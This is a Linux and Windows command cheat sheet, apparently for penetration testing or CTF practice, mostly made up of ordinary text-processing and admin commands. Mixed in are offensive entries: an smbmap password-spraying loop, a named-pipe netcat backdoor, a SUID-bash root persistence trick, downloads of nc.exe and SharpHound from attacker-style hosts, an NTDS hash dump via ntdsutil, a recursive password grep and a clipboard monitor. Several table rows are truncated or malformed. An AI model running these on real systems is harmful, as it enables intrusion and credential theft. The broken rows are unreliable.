# Linux | Command | Purpose | | | | -------------------------------------------------------------------------------- | ---------------------------------------------------------------------------------------------------------------------------- | -------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------- | | `GREENIE=haha; export GREENIE` | Creates an environment variable named `GREENIE` with value `haha`, then exports it to be available to other programs | | | | `PATH=$PATH:/root/haha` | Adds the folder `/root/haha` to the system `PATH` environment variable while retaining the previous `PATH` value | | | | `sort | uniq -c | sort -n` | Takes `stdin`, sorts it, finds out the count of each unique value, then sorts by the count value in ascending order | | `cat squid_access.log | sort -k 2 | head` | Reads `squid_access.log`, sorts it based on the second column, and displays the first 10 lines of the sorted output | | `wc -l` | Counts the number of lines in a file or from `stdin` | | | | `wc -c` | Counts the number of bytes in a file or from `stdin` | | | | `wc -w` | Counts the number of words in a file or from `stdin` | | | | `awk '{print $1,$4}'` | Prints the first and fourth (non-zero indexed) characters/fields from `stdin` | | | | `awk '{print $(NF-1)}'` | Prints the second to last column from `stdin` | | | | `awk '{print length, $1}'` | Prints the length of each line and the contents of the first field/column from `stdin` | | | | `awk '{ sum += $1 } END { print sum }'` | Takes the lines from a file/`stdin` and adds up the values in the first field/column, acting as a quick and dirty calculator | | | | `cat peptides.txt | while read line; do echo $line; done` | Reads in each line from `peptides.txt`, then performs `echo` for each line | | | `cat users.txt | while read i; do echo trying $i; smbmap -u '$i' -p '$i' -H 10.10.10.172; done` | Reads in each line from `users.txt`, then performs a password spraying attack on `10.10.10.172` using `smbmap` | | | `for i in {1..5}; do echo $i; done` | Loops from 1 to 5 and displays the value of `i` for each iteration | | | | `for i in {000..999}; do echo KEY-HAHA-$i; done` | Creates a list of all values from `KEY-HAHA-000` to `KEY-HAHA-999` and displays each value | | | | `TF=$(mktemp -d)` | Creates a temporary directory and assigns its path to an environment variable named `TF` | | | | `${#TF}` | Outputs the length of the value stored in the environment variable `TF` | | | | `sed 's/12/13/g'` | Replaces all instances of `12` with `13` in stdin, will replace `1234` with `1334` | | | | `sed -i.bak '/line to delete/d' | ` | Deletes a line of text for all files in a directory | | | `xxd -p` | Prints the hex of stdin or a file only, without hexdump format | | | | `xxd -r` | Interprets raw hex from stdin, can redirect to save the hex to a file | | | | `tr -d '\r' | tr -d '\n' | xxd -r -p` | Takes hex input, removes newlines, and places it into a file | | `find / -user Matt 2>/dev/null` | Finds all files owned by `Matt` on the box, redirects `stderr` to null | | | | `find /etc -type f --name apache2. | ` | Finds any file which begins with `apache2. | ` in `/etc` | | `grep -E "(25[0-5] | 2[0-4][0-9] | [01]?[0-9][0-9]?)\.(25[0-5] | 2[0-4][0-9] | | `curl -d "param1=value¶m2=value" https://example.com/resource.cgi` | Sends parameters with `curl` | | | | `date -d @1286536308` | Converts an epoch timestamp to `date` output | | | | `mknod backpipe p; /bin/bash 0backpipe` | Creates a netcat backdoor without `-e` support | | | `tar -zcvf files.tar.gz /var/log/apache2` | Creates a `files.tar.gz` archive of all files in `/var/log/apache2` | | | | `prips 10.10.10.0/24` | Prints all IPs in a specific subnet | | | | `ifconfig eth0 169.254.0.1 netmask 255.255.0.0 broadcast 169.254.255.255` | Assigns an IP address from the terminal | | | | `ifconfig eth0 down; ifconfig eth0 hw ether 00:11:22:33:44:55; ifconfig eth0 up` | Changes the MAC address for interface `eth0` | | | | `dhclient eth0` | Requests a DHCP address on interface `eth0` | | | | `dd if=./input.file of=./outfile` | Makes a bit-by-bit copy of a file or system | | | | `sudo ln -s /usr/bin/python3 /usr/bin/python` | Creates a symbolic link for Python to run Python 3 | | | | `sudo mkdir /mnt/new` | Creates a new directory `/mnt/new` with `sudo` permissions | | | | `mount /dev/sbd1 /mnt/new` | Mounts the file system located at `/dev/sbd1` to the directory `/mnt/new` | | | | `umount /dev/sdb1` | Unmounts the file system located at `/dev/sdb1` | | | | `sudo route add -net default gw 10.10.0.1 netmask 0.0.0.0 dev wlan0 metric 1` | Adds another default route with a higher metric to choose a different interface to access the Internet | | | | `sudo dhclient wlan0` | Requests a new DHCP lease on interface `wlan0` | | | | `openssl enc -aes-256-cbc -salt -in file.txt -out file.txt.enc` | Encrypts a file with a password at the command line | | | | `openssl enc -aes-256-cbc -d -in file.txt.enc -out file.txt` | Decrypts a file using a password at the command line | | | | `sudo chmod +s /bin/bash`
`bash -p` | Execute the command in a machine, and if root access is lost, use "bash -p" for a root shell. | | | --- # Windows | Command | Purpose | | ------------------------------------------------------------------------------------------- | ---------------------------------------------------------------------------------------------------------- | | `get-childitem -hidden` | Shows all hidden files in the current directory | | `gci -recurse C:\ | % { select-string -path $_ -pattern password} 2>$null` | | `1..255 | % {ping -n1 192.168.0.$_ | | `(New-Object System.Net.Webclient).DownloadFile("http://10.1.1.1:8000/nc.exe","C:\nc.exe")` | Downloads a file to the `C:\` location | | `certutil -hashfile ntds.dit md5` | Hashes a file using MD5 | | `certutil -encodehex ntds.dit ntds.hex` | Encodes a file as hexadecimal | | `certutil -encode test.jpg test.base64` | Encodes a file as base64 | | `certutil -decode test.base64 test.jpg` | Decodes a base64-encoded file | | `iwr -uri http://10.10.14.27/SharpHound.ps1 -outfile SharpHound.ps1` | Downloads a file from another machine | | `$x=""; while ($true) { $y=get-clipboard -raw; if ($x -ne $y) { write-host $y; $x=$y } }` | Monitors the clipboard and prints its contents to the screen | | `ntdsutil; activate instance ntds; ifm; create full C:\ntds; quit; quit;` | Uses `ntdsutil` to obtain the `SYSTEM` registry and hive data as a backup, containing user hashes to crack |